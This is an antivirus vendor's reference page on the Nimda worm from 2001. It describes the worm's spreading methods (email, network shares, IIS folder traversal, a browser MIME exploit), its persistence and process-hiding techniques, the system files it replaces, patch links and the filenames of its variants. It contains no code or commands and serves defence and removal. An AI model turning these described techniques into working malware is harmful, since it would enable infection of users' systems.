W32/Nimda.A@mm

Download VIRUSfighter NOW
W32/Nimda.A@mm Destructivity: Spreading: Overall risk:
  
• Detected by virus detection files published: 9/19/2001 • Type: Backdoor, Virus, Worm
• Virus characteristics first published: 9/19/2001 • Spreading mechanism: Email, Network, Webpage
• Virus characteristics latest update: 8/29/2005 • Overall risk: High
• Infection type: Microsoft Windows 95/98/98 SE/ME/NT 4/2000/XP/2003/Vista  

Virus type Spreading
mechanism 		Destructivity
and payload 		Additional
descriptions 		Detection
and removal
This email virus uses a multitude of methods to spread itself.


  • It spreads via email from infected users. It sends itself to addresses picked from HTML-pages on the infected machines and also looks for addresses in the users mail inbox. The emailing is done through its own SMTP routine. Emails have no body text and none or random Subject line. The attachment name is README.EXE.

  • It spreads via network shared drives with write access, and also sets open shares on the drives of the machines it infects. The virus may copy a lot of files to these remote machines. The files will be named after files found on the local machine, but will have *.EML and *.NWS file extension. These files are more or less identical and contain the original exploit used to automatically install the virus when viewed in Internet Explorer or in Outlook/Outlook Express.

  • In addition, the virus may try to infect EXE files, except WINZIP32.EXE. These files will contain the virus first, and then the original EXE file contained as a resource at the end of the combined file.

  • It spreads to web servers running Microsoft Internet Information Server (IIS), through a number of different security holes. The most important is the "Web Server Folder Traversal" vulnerability, which can give access to the web server hard disk. The worm can then copy itself over as ADMIN.DLL, which, by referencing it via HTTP, is activated on the server. The virus also looks for the backdoors set open by the NT/CodeRed.C worm.

  • It infects web pages (*.HTM, *.HTML, *.ASP) by adding a tiny javascript to these. The script will open a browser window that references a file called README.EML when the web page is accessed. This EML file contains an "Incorrect MIME Header Can Cause IE to Execute E-mail Attachment" exploit, which can cause the virus to be automatically downloaded and executed on the users machine. Users may as such be infected without knowing it, just by browsing the web. Combined with the spreading to the web server this makes a unique and dangerous spreading mechanism.

When the virus is first executed, it will create a number of copies of itself in the Windows TEMP directory. It will then create a hidden copy called LOAD.EXE in the Windows system directory, and point to this file from SYSTEM.INI so that it is loaded from bootup.

In WinNT, the viral program itself runs in EXPLORER.EXE's address space, using the Windows API CreateRemoteThread. Thus, it will not be obvious in the Task List. In Win9x and WinMe, the program uses an API called RegisterServiceProcess that will accomplish the same thing. These techniques were first seen in the backdoor trojans BackOrifice and BackOrifice 2000.

Damage
The virus contains little intentional damaging routines. However, it will attempt to overwrite the files RICHED20.DLL and MMC.EXE with itself - and these are normal Windows components. RICHED20.DLL is a component used by several programs such as Microsoft Word to view files of Rich Text Format. Thus, by replacing this component, the virus is invoked every time Word or another application using this file is started. MMC.EXE is the Microsoft Management Console program and is normally located in the Windows system folder. These files must be replaced from installation media.

Note for Web administrators
When the virus spreads to a web server, it uses a number of different techniques - most importantly the "Web Server Folder Traversal" vulnerability. Users who run IIS servers should make certain they have applied the cumulative IIS patch available from Microsoft.

Information from:

http://www.microsoft.com/technet/treeview/default.asp?url=
/technet/security/bulletin/MS00-078.asp

Cumulative patch from:

http://www.microsoft.com/technet/treeview/default.asp?url=
/technet/security/bulletin/MS01-044.asp

Note for all users
When the virus spreads via email and from infected web servers, the user(s) may be infected without any action from the user. This is accomplished using a known security hole "Incorrect MIME Header Can Cause IE to Execute E-mail Attachment".

Information and patch is available from: http://www.microsoft.com/technet/treeview/default.asp?
url=/technet/security/bulletin/MS01-020.asp

The security hole is a known issue with Internet Explorer versions 5.01 and 5.5 without SP2 . Users who have this configuration should apply the available patch.
Variants
There are several variants of Nimda. Below is a listing of variants and the names of the files infected by the those:

Nimda.A
README.EXE (the email attachment), MMC.EXE, LOAD.EXE, RICHED20.DLL, ADMIN.DLL

Nimda.B
PUTA!!.SCR (the email attachment), MMC.EXE, PUTA.SCR, RICHED20.DLL, ADMIN.DLL

Nimda.C
Like the A variant

Nimda.D
Like the A variant

Nimda.E
SAMPLE.EXE (the email attachment), CSRSS.EXE, LOAD.EXE, RICHED20.DLL, HTTPODBC.DLL

Nimda.F
PUTA!!.SCR (the email attachment), MMC.EXE, LOAD.EXE, RICHED20.DLL, ADMIN.DLL
# - A - B - C - D - E - F - G - H - I - J - K - L - M - N - O - P - Q - R - S - T - U - V - W - X - Y - Z
To protect and serve, VirusFighter